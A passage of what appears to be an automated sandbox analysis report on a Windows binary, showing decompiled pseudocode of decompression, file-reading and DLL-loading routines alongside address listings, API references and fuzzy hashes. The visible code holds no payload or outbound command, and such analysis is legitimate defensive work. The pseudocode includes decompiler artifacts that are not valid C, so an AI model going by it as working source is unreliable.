              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 0x58);
              												 *(__ebp - 0x84) = 0x13;
              												__esi =  *(__ebp - 0x58) + 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x4c);
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											__eflags = __eax;
              											__eax =  *(__ebp - 0x58) + __eax + 4;
              											goto L130;
              										case 0x13:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												L144:
              												 *(__ebp - 0x7c) = 0x14;
              												goto L145;
              											}
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											L130:
              											 *(__ebp - 0x58) = __eax;
              											 *(__ebp - 0x40) = 3;
              											goto L144;
              										case 0x14:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											 *(_t613 - 0x88) = _t533;
              											goto L1;
              										case 0x15:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L120;
              										case 0x16:
              											__eax =  *(__ebp - 0x30);
              											__eflags = __eax - 4;
              											if(__eax >= 4) {
              												_push(3);
              												_pop(__eax);
              											}
              											__ecx =  *(__ebp - 4);
              											 *(__ebp - 0x40) = 6;
              											__eax = __eax << 7;
              											 *(__ebp - 0x7c) = 0x19;
              											 *(__ebp - 0x58) = __eax;
              											goto L145;
              										case 0x17:
              											L145:
              											__eax =  *(__ebp - 0x40);
              											 *(__ebp - 0x50) = 1;
              											 *(__ebp - 0x48) =  *(__ebp - 0x40);
              											goto L149;
              										case 0x18:
              											L146:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x18;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t484 = __ebp - 0x70;
              											 *_t484 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t484;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L148:
              											_t487 = __ebp - 0x48;
              											 *_t487 =  *(__ebp - 0x48) - 1;
              											__eflags =  *_t487;
              											L149:
              											__eflags =  *(__ebp - 0x48);
              											if( *(__ebp - 0x48) <= 0) {
              												__ecx =  *(__ebp - 0x40);
              												__ebx =  *(__ebp - 0x50);
              												0 = 1;
              												__eax = 1 << __cl;
              												__ebx =  *(__ebp - 0x50) - (1 << __cl);
              												__eax =  *(__ebp - 0x7c);
              												 *(__ebp - 0x44) = __ebx;
              												while(1) {
              													 *(_t613 - 0x88) = _t533;
              													goto L1;
              												}
              											}
              											__eax =  *(__ebp - 0x50);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              											__eax =  *(__ebp - 0x58);
              											__esi = __edx + __eax;
              											 *(__ebp - 0x54) = __esi;
              											__ax =  *__esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												__cx = __ax >> 5;
              												__eax = __eax - __ecx;
              												__edx = __edx + 1;
              												__eflags = __edx;
              												 *__esi = __ax;
              												 *(__ebp - 0x50) = __edx;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L148;
              											} else {
              												goto L146;
              											}
              										case 0x19:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												 *(__ebp - 0x2c) = __ebx;
              												L119:
              												_t393 = __ebp - 0x2c;
              												 *_t393 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t393;
              												L120:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t400 = __ebp - 0x60;
              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t400;
              												goto L123;
              											}
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L102:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L108:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L112:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														_t391 = __ebp - 0x2c;
              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t391;
              														goto L119;
              													}
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L111:
              														_t368 = __ebp - 0x48;
              														 *_t368 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t368;
              														goto L112;
              													} else {
              														goto L109;
              													}
              												}
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L101:
              													_t338 = __ebp - 0x48;
              													 *_t338 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t338;
              													goto L102;
              												} else {
              													goto L99;
              												}
              											}
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L108;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L79;
              										case 0x1b:
              											L75:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t274 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t274;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t283 = __ebp - 0x64;
              											 *_t283 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t283;
              											 *( *(__ebp - 0x68)) = __cl;
              											L79:
              											 *(__ebp - 0x14) = __edx;
              											goto L80;
              										case 0x1c:
              											while(1) {
              												L123:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t414 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t414;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t414;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L80:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											 *(__ebp - 0x88) = 0x1c;
              											goto L170;
              									}
              								}
              								L171:
              								_t535 = _t534 | 0xffffffff;
              								goto L172;
              							}
              						}
              					}
              				}
              			}













              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
              • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E00403411(intOrPtr _a4) {
              				intOrPtr _t10;
              				intOrPtr _t11;
              				signed int _t12;
              				void* _t14;
              				void* _t15;
              				long _t16;
              				void* _t18;
              				intOrPtr _t19;
              				intOrPtr _t31;
              				long _t32;
              				intOrPtr _t34;
              				intOrPtr _t36;
              				void* _t37;
              				intOrPtr _t49;
              
              				_t32 =  *0x420ef4; // 0x3770f
              				_t34 = _t32 -  *0x40ce60 + _a4;
              				 *0x42a270 = GetTickCount() + 0x1f4;
              				if(_t34 <= 0) {
              					L22:
              					E00402FC6(1);
              					return 0;
              				}
              				E00403590( *0x420f04);
              				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
              				 *0x420f00 = _t34;
              				 *0x420ef0 = 0;
              				while(1) {
              					_t10 =  *0x420ef8; // 0x3f4d2
              					_t31 = 0x4000;
              					_t11 = _t10 -  *0x420f04;
              					if(_t11 <= 0x4000) {
              						_t31 = _t11;
              					}
              					_t12 = E0040357A(0x414ef0, _t31);
              					if(_t12 == 0) {
              						break;
              					}
              					 *0x420f04 =  *0x420f04 + _t31;
              					 *0x40ce80 = 0x414ef0;
              					 *0x40ce84 = _t31;
              					L6:
              					L6:
              					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
              						_t19 =  *0x420f00; // 0x31437
              						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
              						E00402FC6(0);
              					}
              					 *0x40ce88 = 0x40cef0;
              					 *0x40ce8c = 0x8000; // executed
              					_t14 = E00406AAC(0x40ce68); // executed
              					if(_t14 < 0) {
              						goto L20;
              					}
              					_t36 =  *0x40ce88; // 0x40ff7b
              					_t37 = _t36 - 0x40cef0;
              					if(_t37 == 0) {
              						__eflags =  *0x40ce84; // 0x0
              						if(__eflags != 0) {
              							goto L20;
              						}
              						__eflags = _t31;
              						if(_t31 == 0) {
              							goto L20;
              						}
              						L16:
              						_t16 =  *0x420ef4; // 0x3770f
              						if(_t16 -  *0x40ce60 + _a4 > 0) {
              							continue;
              						}
              						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
              						goto L22;
              					}
              					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
              					if(_t18 == 0) {
              						_push(0xfffffffe);
              						L21:
              						_pop(_t15);
              						return _t15;
              					}
              					 *0x40ce60 =  *0x40ce60 + _t37;
              					_t49 =  *0x40ce84; // 0x0
              					if(_t49 != 0) {
              						goto L6;
              					}
              					goto L16;
              					L20:
              					_push(0xfffffffd);
              					goto L21;
              				}
              				return _t12 | 0xffffffff;
              			}


















              APIs
              • GetTickCount.KERNEL32 ref: 00403425
                • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
              • SetFilePointer.KERNELBASE(0003770F,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: FilePointer$CountTick
              • String ID:
              • API String ID: 1092082344-0
              • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
              • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E004020D0(void* __ebx, void* __eflags) {
              				struct HINSTANCE__* _t23;
              				struct HINSTANCE__* _t31;
              				void* _t32;
              				WCHAR* _t35;
              				intOrPtr* _t36;
              				void* _t37;
              				void* _t39;
              
              				_t32 = __ebx;
              				asm("sbb eax, 0x42a338");
              				 *(_t39 - 4) = 1;
              				if(__eflags < 0) {
              					_push(0xffffffe7);
              					L15:
              					E00401423();
              					L16:
              					 *0x42a308 =  *0x42a308 +  *(_t39 - 4);
              					return 0;
              				}
              				_t35 = E00402D3E(0xfffffff0);
              				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
              				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
              					L3:
              					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
              					_t47 = _t23 - _t32;
              					 *(_t39 + 8) = _t23;
              					if(_t23 == _t32) {
              						_push(0xfffffff6);
              						goto L15;
              					}
              					L4:
              					_t36 = E004069A0(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
              					if(_t36 == _t32) {
              						E004055A4(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
              					} else {
              						 *(_t39 - 4) = _t32;
              						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
              							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
              						} else {
              							E00401423( *((intOrPtr*)(_t39 - 0x28)));
              							if( *_t36() != 0) {
              								 *(_t39 - 4) = 1;
              							}
              						}
              					}
              					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403BAB( *(_t39 + 8)) != 0) {
              						FreeLibrary( *(_t39 + 8));
              					}
              					goto L16;
              				}
              				_t31 = GetModuleHandleW(_t35); // executed
              				 *(_t39 + 8) = _t31;
              				if(_t31 != __ebx) {
              					goto L4;
              				}
              				goto L3;
              			}











              APIs
              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
              • String ID:
              • API String ID: 334405425-0
              • Opcode ID: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction ID: f92bc13af20f738db02ac2fc0b39f0a9d6660206439d55b7b5299bd0a9e162c8
              • Opcode Fuzzy Hash: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction Fuzzy Hash: 4521C671600204EBCF10AFA5CE48A9E7B70AF44358F70413BF511B91E1C7BD8E82966E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
              				long _v8;
              				long _t21;
              				long _t22;
              				void* _t24;
              				long _t26;
              				int _t27;
              				long _t28;
              				void* _t30;
              				long _t31;
              				long _t32;
              				long _t36;
              
              				_t21 = _a4;
              				if(_t21 >= 0) {
              					_t32 = _t21 +  *0x42a2d8;
              					 *0x420ef4 = _t32;
              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
              				}
              				_t22 = E00403411(4);
              				if(_t22 >= 0) {
              					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
              					if(_t24 == 0) {
              						L18:
              						_push(0xfffffffd);
              						goto L19;
              					} else {
              						 *0x420ef4 =  *0x420ef4 + 4;
              						_t36 = E00403411(_a4);
              						if(_t36 < 0) {
              							L21:
              							_t22 = _t36;
              						} else {
              							if(_a12 != 0) {
              								_t26 = _a4;
              								if(_t26 >= _a16) {
              									_t26 = _a16;
              								}
              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
              								if(_t27 != 0) {
              									_t36 = _v8;
              									 *0x420ef4 =  *0x420ef4 + _t36;
              									goto L21;
